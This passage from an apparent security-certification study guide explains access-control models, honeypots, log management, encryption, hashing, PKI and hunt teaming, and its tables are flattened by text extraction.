or object, and may include the current time, day of the week,
location of a user, or the current threat level.
Figure 8-28 shows a basic ABAC scenario according to NIST SP
800-162.
FIGURE 8-28 NIST SP 800-162 Basic ABAC Scenario
As specified in NIST SP 800-162, there are characteristics or
attributes of a subject such as name, date of birth, home
address, training record, and job function that may, either
individually or when combined, comprise a unique identity that
distinguishes that person from all others. These characteristics
are often called subject attributes.
Like subjects, each object has a set of attributes that help
describe and identify it. These traits are called object attributes
(sometimes referred to as resource attributes). Object attributes
are typically bound to their objects through reference, by
embedding them within the object, or through some other
means of assured association such as cryptographic binding.
ACLs and RBAC are in some ways special cases of ABAC in
terms of the attributes used. ACLs work on the attribute of
“identity.” RBAC works on the attribute of “role.” The key
difference with ABAC is the concept of policies that express a
complex Boolean rule set that can evaluate many different
attributes. While it is possible to achieve ABAC objectives using
ACLs or RBAC, demonstrating access control requirements
compliance is difficult and costly due to the level of abstraction
required between the access control requirements and the ACL
or RBAC model. Another problem with ACL or RBAC models is
that if the access control requirement is changed, it may be
difficult to identify all the places where the ACL or RBAC
implementation needs to be updated.
ABAC relies upon the assignment of attributes to subjects and
objects, and the development of policy that contains the access
rules. Each object within the system must be assigned specific
object attributes that characterize the object. Some attributes
pertain to the entire instance of an object, such as the owner.
Other attributes may only apply to parts of the object.
Each subject that uses the system must be assigned specific
attributes. Every object within the system must have at least one
policy that defines the access rules for the allowable subjects,
operations, and environment conditions to the object. This
policy is normally derived from documented or procedural rules
that describe the business processes and allowable actions
within the organization. The rules that bind subject and object
attributes indirectly specify privileges (i.e., which subjects can
perform which operations on which objects). Allowable
operation rules can be expressed through many forms of
computational language such as
A Boolean combination of attributes and conditions that satisfies
the authorization for a specific operation
A set of relations associating subject and object attributes and
allowable operations
Once object attributes, subject attributes, and policies are
established, objects can be protected using ABAC. Access
control mechanisms mediate access to the objects by limiting
access to allowable operations by allowable subjects. The access
control mechanism assembles the policy, subject attributes, and
object attributes, then renders and enforces a decision based on
the logic provided in the policy. Access control mechanisms
must be able to manage the process required to make and
enforce the decision, including determining what policy to
retrieve, which attributes to retrieve in what order, and where to
retrieve attributes. The access control mechanism must then
perform the computation necessary to render a decision.
The policies that can be implemented in an ABAC model are
limited only to the degree imposed by the computational
language and the richness of the available attributes. This
flexibility enables the greatest breadth of subjects to access the
greatest breadth of objects without having to specify individual
relationships between each subject and each object.
While ABAC is an enabler of information sharing, the set of
components required to implement ABAC gets more complex
when deployed across an enterprise. At the enterprise level, the
increased scale requires complex and sometimes independently
established management capabilities necessary to ensure
consistent sharing and use of policies and attributes and the
controlled distribution and employment of access control
mechanisms throughout the enterprise.
Mandatory Access Control
In mandatory access control (MAC), subject authorization
is based on security labels. MAC is often described as
prohibitive because it is based on a security label system. Under
MAC, all that is not expressly permitted is forbidden. Only
administrators can change the category of a resource.
Because of the importance of security in MAC, labeling is
required. Data classification reflects the data’s sensitivity. In a
MAC system, a clearance is a privilege to access a class of items
that are organized by sensitivity. Each subject and object is
given a security or sensitivity label. The security labels are
hierarchical. For commercial organizations, the levels of
security labels could be confidential, proprietary, corporate,
sensitive, and public. For government or military institutions,
the levels of security labels could be top secret, secret,
confidential, and unclassified.
In MAC, the system makes access decisions when it compares a
subject’s clearance level with an object’s security label. MAC
access systems operate in different security modes at various
times, based on variables such as sensitivity of data, the
clearance level of the user, and the actions the user is authorized
to take. These security modes are as follows:
Dedicated security mode: A system is operating in dedicated
security mode if it employs a single classification level. In this
system, all users can access all data, but they must sign a
nondisclosure agreement (NDA) and be formally approved for
access on a need-to-know basis.
System high security mode: In a system operating in system
high security mode, all users have the same security clearance (as in
the dedicated security mode), but they do not all possess a need-toknow clearance for all the information in the system. Consequently,
although a user might have clearance to access an object, she still
might be restricted if she does not have need-to-know clearance
pertaining to the object.
Compartmented security mode: In a compartmented security
mode system, all users must possess the highest security clearance
(as in both dedicated and system high security modes), but they
must also have valid need-to-know clearance, a signed NDA, and
formal approval for all information to which they have access. The
objective is to ensure that the minimum number of people possible
have access to information at each level or compartment.
Multilevel security mode: When a system allows two or more
classification levels of information to be processed at the same time,
it is said to be operating in multilevel security mode. Users must
have a signed NDA for all the information in the system and have
access to subsets based on their clearance level and need-to-know
and formal access approval. These systems involve the highest risk
because information is processed at more than one level of security,
even when all system users do not have appropriate clearances or a
need-to-know for all information processed by the system. This is
also sometimes called controlled security mode.
Manual Review
Users who have been assigned privileged accounts have been
given the right to do things that could cause issues. Privileged
accounts, regardless of the authentication method or
architecture, must be monitored to ensure that these additional
rights are not abused.
While there are products that automate the audit of privileged
accounts, if all else fails a manual review must be done on a
regular basis. This task should not be placed in the “when we
have time” category. There’s never time.
CLOUD ACCESS SECURITY BROKER
(CASB)
A cloud security broker, or cloud access security broker
(CASB), is a software layer that operates as a gatekeeper
between an organization’s on-premises network and the
provider’s cloud environment. It can provide many services in
this strategic position, as shown in Figure 8-29. Vendors in the
CASB include McAfee and Netskope.
Figure 8-29 CASB
HONEYPOT
Honeypots are systems that are configured to be attractive to
hackers and lure them into spending time attacking them while
information is gathered about the attack. In some cases entire
networks called honeynets are attractively configured for this
purpose. These types of approaches should only be undertaken
by companies with the skill to properly deploy and monitor
them.
Care should be taken that the honeypots and honeynets do not
provide direct connections to any important systems. This
prevents providing a jumping-off point to other areas of the
network. The ultimate purpose of these systems is to divert
attention from more valuable resources and to gather as much
information about an attack as possible. A tarpit is a type of
honeypot designed to provide a very slow connection to the
hacker so that the attack can be analyzed.
MONITORING AND LOGGING
Monitoring and monitoring tools will be discussed in much
more depth in several subsequent chapters, but it is important
that we talk here about logging and monitoring in the context of
infrastructure management.
Log Management
Typically, system, network, and security administrators are
responsible for managing logging on their systems, performing
regular analysis of their log data, documenting and reporting
the results of their log management activities, and ensuring that
log data is provided to the log management infrastructure in
accordance with the organization’s policies. In addition, some of
the organization’s security administrators act as log
management infrastructure administrators, with
responsibilities such as the following:
Contact system-level administrators to get additional information
regarding an event or to request investigation of a particular event.
Identify changes needed to system logging configurations (for
example, which entries and data fields are sent to the centralized
log servers, what log format should be used) and inform systemlevel administrators of the necessary changes.
Initiate responses to events, including incident handling and
operational problems (for example, a failure of a log management
infrastructure component).
Ensure that old log data is archived to removable media and
disposed of properly when it is no longer needed.
Cooperate with requests from legal counsel, auditors, and others.
Monitor the status of the log management infrastructure (for
example, failures in logging software or log archival media, failures
of local systems to transfer their log data) and initiate appropriate
responses when problems occur.
Test and implement upgrades and updates to the log management
infrastructure’s components.
Maintain the security of the log management infrastructure.
Organizations should develop policies that clearly define
mandatory requirements and suggested recommendations for
several aspects of log management, including the following: log
generation, log transmission, log storage and disposal, and log
analysis. Table 8-3 provides examples of logging configuration
settings that an organization can use. The types of values
defined in Table 8-3 should only be applied to the hosts and
host components previously specified by the organization as
ones that must or should be logging security-related events.
Table 8-3 Examples of Logging Configuration Settings
Category
Low-Impact
System
ModerateImpact
System
High-Impact
System
Log
retention
duration
1–2 weeks
1–3
months
3–12
months
Log
rotation
Optional (if
performed, at
least every week
or every 25 MB)
Every 6–
24 hours,
or every
2–5 MB
Every 15–60
minutes, or
every 0.5–
1.0 MB
Log data
transfer
frequency
(to SIEM)
Every 3–24 hours
Every
15–60
minutes
At least
every 5
minutes
Local log
data
analysis
Every 1–7 days
Every
12–24
hours
At least 6
times a day
File
integrity
check for
rotated
logs?
Optional
Yes
Yes
Encrypt
rotated
logs?
Optional
Optional
Yes
Encrypt
log data
transfers
to SIEM?
Optional
Yes
Yes
Audit Reduction Tools
Audit reduction tools are preprocessors designed to reduce the
volume of audit records to facilitate manual review. They are
discussed in Chapter 7.
NIST SP 800-137
According to NIST SP 800-137, information security continuous
monitoring (ISCM) is defined as maintaining ongoing
awareness of information security, vulnerabilities, and threats
to support organizational risk management decisions.
Organizations should take the following steps to establish,
implement, and maintain ISCM:
1. Define an ISCM strategy based on risk tolerance that maintains
clear visibility into assets, awareness of vulnerabilities, up-to-date
threat information, and mission/business impacts.
2. Establish an ISCM program that includes metrics, status
monitoring frequencies, control assessment frequencies, and an
ISCM technical architecture.
3. Implement an ISCM program and collect the security-related
information required for metrics, assessments, and reporting.
Automate collection, analysis, and reporting of data where possible.
4. Analyze the data collected, report findings, and determine the
appropriate responses. It may be necessary to collect additional
information to clarify or supplement existing monitoring data.
5. Respond to findings with technical, management, and operational
mitigating activities or acceptance, transference/sharing, or
avoidance/rejection.
6. Review and update the monitoring program, adjusting the ISCM
strategy and maturing measurement capabilities to increase
visibility into assets and awareness of vulnerabilities, further enable
data-driven control of the security of an organization’s information
infrastructure, and increase organizational resilience.
ENCRYPTION
Protecting information with cryptography involves the
deployment of a cryptosystem. A cryptosystem consists of
software, protocols, algorithms, and keys. The strength of any
cryptosystem comes from the algorithm and the length and
secrecy of the key. For example, one method of making a
cryptographic key more resistant to exhaustive attacks is to
increase the key length. If the cryptosystem uses a weak key, it
facilitates attacks against the algorithm.
While a cryptosystem supports the three core principles of the
confidentiality, integrity, and availability (CIA) triad,
cryptosystems directly provide authentication, confidentiality,
integrity, authorization, and non-repudiation. The availability
tenet of the CIA triad is supported by cryptosystems, meaning
that implementing cryptography will help to ensure that an
organization’s data remains available. However, cryptography
does not directly ensure data availability, although it can be
used to protect the data. Security services provided by
cryptosystems include the following:
Authentication: Cryptosystems provide authentication by being
able to determine the sender’s identity and validity. Digital
signatures verify the sender’s identity. Protecting the key ensures
that only valid users can properly encrypt and decrypt the message.
Confidentiality: Cryptosystems provide confidentiality by altering
the original data in such a way as to ensure that the data cannot be
read except by the valid recipient. Without the proper key,
unauthorized users are unable to read the message.
Integrity: Cryptosystems provide integrity by allowing valid
recipients to verify that data has not been altered. Hash functions
do not prevent data alteration but provide a means to determine
whether data alteration has occurred.
Authorization: Cryptosystems provide authorization by providing
the key to a valid user after that user proves his identity through
authentication. The key given to the user allows the user to access a
resource.
Non-repudiation: Non-repudiation in cryptosystems provides
proof of the origin of data, thereby preventing the sender from
denying that he sent the message and supporting data integrity.
Public key cryptography and digital signatures provide nonrepudiation.
Key management: Key management in cryptography is essential
to ensure that the cryptography provides confidentiality, integrity,
and authentication. If a key is compromised, it can have serious
consequences throughout an organization.
Cryptographic Types
Algorithms that are used in computer systems implement
complex mathematical formulas when converting plaintext to
ciphertext. The two main components to any encryption system
are the key and the algorithm. In some encryption systems, the
two communicating parties use the same key. In other
encryption systems, the two communicating parties use
different keys in the process, but the keys are related. This
section discusses symmetric algorithms and asymmetric
algorithms.
Symmetric Algorithms
Symmetric algorithms use a private or secret key that must
remain secret between the two parties. Each party pair requires
a separate private key. Therefore, a single user would need a
unique secret key for every user with whom she communicates.
Consider an example where there are 10 unique users. Each
user needs a separate private key to communicate with the other
users. To calculate the number of keys that would be needed in
this example, you would use the following formula:
number of users × (number of users – 1) / 2
Therefore, in this example, you would calculate 10 × (10 – 1) / 2
= 45 needed keys.
With symmetric algorithms, the encryption key must remain
secure. To obtain the secret key, the users must find a secure
out-of-band method for communicating the secret key,
including courier or direct physical contact between the users. A
special type of symmetric key called a session key encrypts
messages between two users during one communication
session. Symmetric algorithms can be referred to as single-key,
secret-key, private-key, or shared-key cryptography. Symmetric
systems provide confidentiality but not authentication or nonrepudiation. If both users use the same key, determining where
the message originated is impossible. Symmetric algorithms
include AES, IDEA, Blowfish, Twofish, RC4/RC5/RC6, and
CAST. Table 8-4 lists the strengths and weaknesses of
symmetric algorithms.
Table 8-4 Symmetric Algorithm Strengths and Weaknesses
Strengths
Symmetric algorithms are
Weaknesses
The number of unique keys
1000 to 10,000 times faster
than asymmetric algorithms.
needed can cause key
management issues.
They are hard to break.
Secure key distribution is
critical.
They are cheaper to
implement than asymmetric
algorithms.
Key compromise occurs if one
party is compromised, thereby
allowing impersonation.
The two broad types of symmetric algorithms are stream-based
ciphers and block ciphers. Initialization vectors (IVs) are an
important part of block ciphers. These three components are
discussed next.
Stream-based Ciphers
Stream-based ciphers perform encryption on a bit-by-bit
basis and use keystream generators. The keystream generators
create a bit stream that is XORed with the plaintext bits. The
result of this XOR operation is the ciphertext.
A synchronous stream-based cipher depends only on the key,
and an asynchronous stream cipher depends on the key and
plaintext. The key ensures that the bit stream that is XORed to
the plaintext is random.
Advantages of stream-based ciphers include the following:
They generally have lower error propagation because encryption
occurs on each bit.
They are generally used more in hardware implementations.
They use the same key for encryption and decryption.
They are generally cheaper to implement than block ciphers.
Block Ciphers
Block ciphers perform encryption by breaking the message
into fixed-length units. A message of 1024 bits could be divided
into 16 blocks of 64 bits each. Each of those 16 blocks is
processed by the algorithm formulas, resulting in a single block
of ciphertext. Examples of block ciphers include IDEA,
Blowfish, RC5, and RC6.
Advantages of block ciphers include the following:
Implementation of block ciphers is easier than stream-based cipher
implementation.
They are generally less susceptible to security issues.
They are generally used more in software implementations.
Table 8-5 lists the key facts about each symmetric algorithm.
Table 8-5 Symmetric Algorithms Key Facts
Algori
thm
Name
Block or
Stream
Cipher?
Key Size
Number of
Rounds
Block
Size
3DE
S
Block
56,
112, or
168
bits
48
64 bits
AES
Block
128,
192, or
256
bits
10, 12, or 14
(depending on
block/key size)
128,
192, or
256
bits
IDE
A
Block
128
bits
8
64 bits
Blo
wfis
h
Block
32–
448
bits
16
64 bits
Two
fish
Block
128,
192, or
256
bits
16
128
bits
RC4
Stream
40 to
2048
bits
Up to 256
N/A
RC5
Block
Up to
2048
bits
Up to 255
32, 64,
or 128
bits
RC6
Block
Up to
2048
bits
Up to 255
32, 64,
or 128
bits
The Block ciphers mentioned earlier use initialization vectors
(IVs) to ensure that patterns are not produced during
encryption. These IVs provide this service by using random
values with the algorithms. Without using IVs, a repeated
phrase within a plaintext message could result in the same
ciphertext. Attackers can possibly use these patterns to break
the encryption.
Asymmetric Algorithms
Asymmetric algorithms use both a public key and a private
or secret key. The public key is known by all parties, and the
private key is known only by its owner. One of these keys
encrypts the message, and the other decrypts the message.
(Asymmetric algorithms are also referred to as dual-key or
public-key cryptography.)
In asymmetric cryptography, determining a user’s private key is
virtually impossible even if the public key is known, although
both keys are mathematically related. However, if a user’s
private key is discovered, the system can be compromised.
Asymmetric systems provide confidentiality, integrity,
authentication, and non-repudiation. Because both users have
one unique key that is part of the process, determining where
the message originated is possible. If confidentiality is the
primary concern for an organization, a message should be
encrypted with the receiver’s public key, which is referred to as
secure message format. If authentication is the primary
concern for an organization, a message should be encrypted
with the sender’s private key, which is referred to as open
message format. When using open message format, the
message can be decrypted by anyone with the public key.
Asymmetric algorithms include Diffie-Hellman, RSA, El Gamal,
ECC, Knapsack, DSA, and Zero Knowledge Proof.
Table 8-6 lists the strengths and weaknesses of asymmetric
algorithms.
Table 8-6 Asymmetric Algorithm Strengths and Weaknesses
Strengths
Key distribution is easier and
more manageable than with
symmetric algorithms.
Weaknesses
Asymmetric algorithms are
more expensive to implement
than symmetric algorithms.
Key management is easier
because the same public key
is used by all parties.
They are 1000 to 10,000 times
slower than symmetric
algorithms.
Hybrid Encryption
Because both symmetric and asymmetric algorithms have
weaknesses, solutions have been developed that use both types
of algorithms in a hybrid cipher. By using both algorithm types,
the cipher provides confidentiality, authentication, and nonrepudiation.
The process for hybrid encryption is as follows:
1. The symmetric algorithm provides the keys used for encryption.
2. The symmetric keys are passed to the asymmetric algorithm, which
encrypts the symmetric keys and automatically distributes them.
3. The message is encrypted with the symmetric key.
4. Both the message and the key are sent to the receiver.
5. The receiver decrypts the symmetric key and uses the symmetric
key to decrypt the message.
An organization should use hybrid encryption if the parties do
not have a shared secret key and large quantities of sensitive
data must be transmitted.
Integrity is one of the three basic tenets of security. Message
integrity ensures that a message has not been altered by using
parity bits, cyclic redundancy checks (CRCs), or checksums.
The parity bit method adds an extra bit to the data. This parity
bit simply indicates if the number of 1 bits is odd or even. The
parity bit is 1 if the number of 1 bits is odd, and the parity bit is
0 if the number of 1 bits is even. The parity bit is set before the
data is transmitted. When the data arrives, the parity bit is
checked against the other data. If the parity bit doesn’t match
the data sent, then an error is sent to the originator.
The CRC method uses polynomial division to determine the
CRC value for a file. The CRC value is usually 16 or 32 bits long.
Because CRC is very accurate, the CRC value does not match up
if a single bit is incorrect.
The checksum method adds up the bytes of data being sent and
then transmits that number to be checked later using the same
method. The source adds up the values of the bytes and sends
the data and its checksum. The receiving end receives the
information, adds up the bytes in the same way the source did,
and gets the checksum. The receiver then compares his
checksum with the source’s checksum. If the values match,
message integrity is intact. If the values do not match, the data
should be re-sent or replaced. Checksums are also referred to as
hash sums because they typically use hash functions for the
computation.
Message integrity is provided by hash functions and message
authentication code, as discussed next.
Hashing Functions
Hash functions are used to ensure integrity. This section
discusses some of the most popular hash functions. Some of
these might no longer be commonly used because more secure
alternatives are available. Security professionals should be
familiar with the following hash functions:
One-way hash
MD2/MD4/MD5/MD6
SHA/SHA-2/SHA-3
A hash function takes a message of variable length and
produces a fixed-length hash value. Hash values, also referred
to as message digests, are calculated using the original message.
If the receiver calculates a hash value that is the same, then the
original message is intact. If the receiver calculates a hash value
that is different, then the original message has been altered.
Using a given function H, the following equation must be true to
ensure that the original message, M1, has not been altered or
replaced with a new message, M2:
H(M1) < > H(M2)
One-way Hash
For a one-way hash to be effective, creating two different
messages with the same hash value must be mathematically
impossible. Given a hash value, discovering the original
message from which the hash value was obtained must be
mathematically impossible. A one-way hash algorithm is
collision free if it provides protection against creating the same
hash value from different messages.
Unlike symmetric and asymmetric algorithms, the hashing
algorithm is publicly known. Hash functions are always
performed in one direction. Using it in reverse is unnecessary.
However, one-way hash functions do have limitations. If an
attacker intercepts a message that contains a hash value, the
attacker can alter the original message to create a second,
invalid message with a new hash value. If the attacker then
sends the invalid message to the intended recipient, the
intended recipient has no way of knowing that he received an
incorrect message. When the receiver performs a hash value
calculation, the invalid message looks valid because the invalid
message was appended with the attacker’s new hash value, not
the original message’s hash value.
To prevent the preceding scenario from occurring, the sender
should use a message authentication code (MAC). Encrypting
the hash function with a symmetric key algorithm generates a
keyed MAC. The symmetric key does not encrypt the original
message. It is used only to protect the hash value.
Figure 8-30 outlines the basic steps of a hash function.
Figure 8-30 Hash Function Process
Message Digest Algorithm
The MD2 message digest algorithm produces a 128-bit hash
value. It performs 18 rounds of computations. Although MD2 is
still in use today, it is much slower than MD4, MD5, and MD6.
The MD4 algorithm also produces a 128-bit hash value.
However, it performs only three rounds of computations.
Although MD4 is faster than MD2, its use has significantly
declined because attacks against it have been so successful.
Like the other MD algorithms, the MD5 algorithm produces a
128-bit hash value. It performs four rounds of computations. It
was originally created because of the issues with MD4, and it is
more complex than MD4. However, MD5 is not collision free.
For this reason, it should not be used for SSL/TLS certificates or
digital signatures. The U.S. government requires the usage of
SHA-2 instead of MD5. However, in commercial usage, many
software vendors publish the MD5 hash value when they release
software patches so customers can verify the software’s integrity
after download.
The MD6 algorithm produces a variable hash value, performing
a variable number of computations. Although it was originally
introduced as a candidate for SHA-3, it was withdrawn because
of early issues the algorithm had with differential attacks. MD6
has since been re-released with this issue fixed. However, that
release was too late to be accepted as the NIST SHA-3 standard.
Secure Hash Algorithm
Secure Hash Algorithm (SHA) is a family of four algorithms
published by NIST. SHA-0, originally referred to as simply SHA
because there were no other “family members,” produces a 160bit hash value after performing 80 rounds of computations on
512-bit blocks. SHA-0 was never very popular because collisions
were discovered.
Like SHA-0, SHA-1 produces a 160-bit hash value after
performing 80 rounds of computations on 512-bit blocks. SHA1 corrected the flaw in SHA-0 that made it susceptible to
attacks.
SHA-3, the latest version, is actually a family of hash functions,
each of which provides different functional limits. The SHA-3
family is as follows:
SHA3-224: Produces a 224-bit hash value after performing 24
rounds of computations on 1152-bit blocks
SHA3-256: Produces a 256-bit hash value after performing 24
rounds of computations on 1088-bit blocks
SHA-3-384: Produces a 384-bit hash value after performing 24
rounds of computations on 832-bit blocks
SHA3-512: Produces a 512-bit hash value after performing 24
rounds of computations on 576-bit blocks
Keep in mind that SHA-1 and SHA-2 are still widely used today.
SHA-3 was not developed because of some security flaw with
the two previous standards but was instead proposed as an
alternative hash function to the others.
Transport Encryption
Securing data at rest and data in transit leverages the respective
strengths and weaknesses of symmetric and asymmetric
algorithms. Applying the two types of algorithms is typically
done as shown in Table 8-7.
Table 8-7 Applying Cryptography
Data Type
Da
ta
at
re
st
Sy
m
me
tric
key
Crypto Type
DES
—
retir
ed
AES
—
revis
ed
3DE
S
Blow
fish
Examples
Application
Storing data on hard drives, thumb
drives, etc.—any application where the
key can easily be shared
Da
ta
in
tra
ns
it
Asy
m
me
tric
key
RSA
Diffi
eHel
man
SSL/TLS key exchange hash
ECC
ElGa
mal
DSA
Transport encryption ensures that data is protected when it is
transmitted over a network or the Internet. Transport
encryption protects against network sniffing attacks.
Security professionals should ensure that their enterprises are
protected using transport encryption in addition to protecting
data at rest. As an example, think of an enterprise that
implements token and biometric authentication for all users,
protected administrator accounts, transaction logging, full-disk
encryption, server virtualization, port security, firewalls with
ACLs, NIPS, and secured access points. None of these solutions
provides any protection for data in transport. Transport
encryption would be necessary in this environment to protect
data. To provide this encryption, secure communication
mechanisms should be used, including SSL/TLS,
HTTP/HTTPS/SHTTP, SET, SSH, and IPsec.
SSL/TLS
Secure Sockets Layer (SSL) is a transport-layer protocol that
provides encryption, server and client authentication, and
message integrity. SSL/TLS was discussed earlier in this
chapter.
HTTP/HTTPS/SHTTP
Hypertext Transfer Protocol (HTTP) is the protocol used on the
Web to transmit website data between a web server and a web
client. With each new address that is entered into the web
browser, whether from initial user entry or by clicking a link on
the page displayed, a new connection is established because
HTTP is a stateless protocol.
HTTP Secure (HTTPS) is the implementation of HTTP running
over the SSL/TLS protocol, which establishes a secure session
using the server’s digital certificate. SSL/TLS keeps the session
open using a secure channel. HTTPS websites always include
the https://designation at the beginning.
Although it sounds similar to HTTPS, Secure HTTP (S-HTTP)
protects HTTP communication in a different manner. S-HTTP
only encrypts a single communication message, not an entire
session (or conversation). S-HTTP is not as commonly used as
HTTPS.
SSH
Secure Shell (SSH) is an application and protocol that is
used to remotely log in to another computer using a secure
tunnel. After the secure channel is established after a session
key is exchanged, all communication between the two
computers is encrypted over the secure channel.
IPsec
Internet Protocol Security (IPsec) is a suite of protocols that
establishes a secure channel between two devices. IPsec is
commonly implemented over VPNs. IPsec was discussed earlier
in this chapter.
CERTIFICATE MANAGEMENT
A public key infrastructure (PKI) includes systems,
software, and communication protocols that distribute, manage,
and control public key cryptography. A PKI publishes digital
certificates. Because a PKI establishes trust within an
environment, a PKI can certify that a public key is tied to an
entity and verify that a public key is valid. Public keys are
published through digital certificates.
The X.509 standard is a framework that enables authentication
between networks and over the Internet. A PKI includes
timestamping and certificate revocation to ensure that
certificates are managed properly. A PKI provides
confidentiality, message integrity, authentication, and nonrepudiation.
The structure of a PKI includes certificate authorities,
certificates, registration authorities, certificate revocation lists,
cross-certification, and the Online Certificate Status Protocol
(OCSP). This section discusses these PKI components as well as
a few other PKI concepts.
Certificate Authority and Registration Authority
Any participant that requests a certificate must first go through
the registration authority (RA), which verifies the
requestor’s identity and registers the requestor. After the
identity is verified, the RA passes the request to the certificate
authority.
A certificate authority (CA) is the entity that creates and
signs digital certificates, maintains the certificates, and revokes
them when necessary. Every entity that wants to participate in
the PKI must contact the CA and request a digital certificate. It
is the ultimate authority for the authenticity for every
participant in the PKI by signing each digital certificate. The
certificate binds the identity of the participant to the public key.
There are different types of CAs. Organizations exist who
provide a PKI as a payable service to companies who need them.
An example is Verisign. Some organizations implement their
own private CAs so that the organization can control all aspects
of the PKI process. If an organization is large enough, it might
need to provide a structure of CAs, with the root CA being the
highest in the hierarchy.
Because more than one entity is often involved in the PKI
certification process, certification path validation allows the
participants to check the legitimacy of the certificates in the
certification path.
Certificates
A digital certificate provides an entity, usually a user, with the
credentials to prove its identity and associates that identity with
a public key. At minimum, a digital certification must provide
the serial number, the issuer, the subject (owner), and the
public key.
An X.509 certificate complies with the X.509 standard. An
X.509 certificate contains the following fields:
Version
Serial Number
Algorithm ID
Issuer
Validity
Subject
Subject Public Key Info
Public Key Algorithm
Subject Public Key
Issuer Unique Identifier (optional)
Subject Unique Identifier (optional)
Extensions (optional)
Verisign first introduced the following digital certificate classes:
Class 1: Intended for use with email. These certificates get saved by
web browsers.
Class 2: For organizations that must provide proof of identity.
Class 3: For servers and software signing in which independent
verification and identity and authority checking is done by the
issuing CA.
Certificate Revocation List
A certificate revocation list (CRL) is a list of digital
certificates that a CA has revoked. To find out whether a digital
certificate has been revoked, the browser must either check the
CRL or the CA must push out the CRL values to clients. This can
become quite daunting when you consider that the CRL
contains every certificate that has ever been revoked.
One concept to keep in mind is the revocation request grace
period. This period is the maximum amount of time between
when the revocation request is received by the CA and when the
revocation actually occurs. A shorter revocation period provides
better security but often results in a higher implementation
cost.
OCSP
The Online Certificate Status Protocol (OCSP) is an
Internet protocol that obtains the revocation status of an X.509
digital certificate. OCSP is an alternative to the standard
certificate revocation list (CRL) that is used by many PKIs.
OCSP automatically validates the certificates and reports back
the status of the digital certificate by accessing the CRL on the
CA.
PKI Steps
The steps involved in requesting a digital certificate are as
follow:
1. A user requests a digital certificate, and the RA receives the request.
2. The RA requests identifying information from the requestor.
3. After the required information is received, the RA forwards the
certificate request to the CA.
4. The CA creates a digital certificate for the requestor. The
requestor’s public key and identity information are included as part
of the certificate.
5. The user receives the certificate.
After the user has a certificate, she is ready to communicate
with other trusted entities. The process for communication
between entities is as follows:
1. User 1 requests User 2’s public key from the certificate repository.
2. The repository sends User 2’s digital certificate to User 1.
3. User 1 verifies the certificate and extracts User 2’s public key.
4. User 1 encrypts the session key with User 2’s public key and sends
the encrypted session key and User 1’s certificate to User 2.
5. User 2 receives User 1’s certificate and verifies the certificate with a
trusted CA.
After this certificate exchange and verification process occurs,
the two entities are able to communicate using encryption.
Cross-Certification
Cross-certification establishes trust relationships between CAs
so that the participating CAs can rely on the other participants’
digital certificates and public keys. It enables users to validate
each other’s certificates when they are actually certified under
different certification hierarchies. A CA for one organization can
validate digital certificates from another organization’s CA when
a cross-certification trust relationship exists.
Digital Signatures
A digital signature is a hash value encrypted with the sender’s
private key. A digital signature provides authentication, nonrepudiation, and integrity. A blind signature is a form of digital
signature where the contents of the message are masked before
it is signed.
Public key cryptography is used to create digital signatures.
Users register their public keys with a certificate authority (CA),
which distributes a certificate containing the user’s public key
and the CA’s digital signature. The digital signature is computed
by the user’s public key and validity period being combined with
the certificate issuer and digital signature algorithm identifier.
The Digital Signature Standard (DSS) is a federal digital
security standard that governs the Digital Security Algorithm
(DSA). DSA generates a message digest of 160 bits. The U.S.
federal government requires the use of DSA, RSA, or Elliptic
Curve DSA (ECDSA) and SHA for digital signatures. DSA is
slower than RSA and only provides digital signatures. RSA
provides digital signatures, encryption, and secure symmetric
key distribution.
When considering cryptography, keep the following facts in
mind:
Encryption provides confidentiality.
Hashing provides integrity.
Digital signatures provide authentication, non-repudiation, and
integrity.
ACTIVE DEFENSE
The importance of defense systems in network architecture is
emphasized throughout this book. In the context of
cybersecurity, the term active defense has more to do with
process than architecture. Active defense is achieved by aligning
your incident identification and incident response processes
such that there is an element of automation built into your
reaction to any specific issue. So what does that look like in the
real world? One approach among several is called the Active
Cyber Defense Cycle, illustrated in Figure 8-31.
Figure 8-31 Active Cyber Defense Cycle
While it may not be obvious from the graphic, one of the key
characteristics of this approach is that there is an active
response to the security issue. This departs from the classic
approach of deploying passive defense mechanisms and relying
on them to protect assets.
Hunt Teaming
Hunt teaming is a new approach to security that is offensive
in nature rather than defensive, which has been the common
approach of security teams in the past. Hunt teams work
together to detect, identify, and understand advanced and
determined threat actors. A hunt team is a costly investment on
the part of an organization. They target the attackers. To use a
bank analogy, when a bank robber compromises a door to rob a
bank, defensive measures would say get a better door, while
offensive measures (hunt teaming) would say eliminate the
bank robber. These cyber guns-for-hire are another tool in the
kit.
Hunt teaming also refers to a collection of techniques used by
security personnel to bypass traditional security technologies to
hunt down other attackers who may have used similar
techniques to mount attacks that have already been identified,
often by other companies. These techniques help in identifying
any systems compromised using advanced malware that
bypasses traditional security technologies, such as an intrusion
detection system/intrusion prevention system (IDS/IPS) or an
antivirus application. As part of hunt teaming, security
professional could also obtain blacklists from sources like
DShield (https://www.dshield.org/). These blacklists would
then be compared to existing DNS entries to see if
communication was occurring with systems on these blacklists
that are known attackers.
Hunt teaming can also emulate prior attacks so that security
professionals can better understand the enterprise’s existing
vulnerabilities and get insight into how to remediate and
prevent future incidents.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 8-8
lists a reference of these key topics and the page numbers on
which each is found.
Table 8-8 Key Topics in Chapter 8
Key Topic Element
Description
Page Number
Bulleted list
Risks when placing resources in a public
cloud
1
7
7
Figure 8-2
Network segmentation
1
8
2
Bulleted list
Threats addressed by VLANs
1
8
3
Figure 8-5
Server isolation
1
8
5
Figure 8-6
Logical network diagram
1
8
6
Figure 8-7
Physical network diagram
1
8
7
Bulleted list
Protecting a bastion host
1
8
8
Bulleted list
Deployment options for a bastion host
1
8
8
Bulleted lists
Advantages and disadvantages of a dualhomed firewall
1
8
9
Bulleted lists
Advantages and disadvantages of a
three-legged firewall
1
9
0
Bulleted lists
Advantages and disadvantages of a
screened host firewall
1
9
1
Bulleted lists
Advantages and disadvantages of a
screened subnet
1
9
2
Bulleted list
Network Architecture planes
1
9
3
Bulleted lists
Advantages and disadvantage of SDN
1
9
4
Bulleted list
VPN protocols
1
9
6
Bulleted list
Components of IPsec
1
9
7
Bulleted list
SSL/TLS VPNs
1
9
9
Table 8-2
Advantages and disadvantages of
SSL/TLS
2
0
0
Bulleted list
Improvements in TLS 1.3
2
0
0
Bulleted list
and paragraph
Security advantages and disadvantages
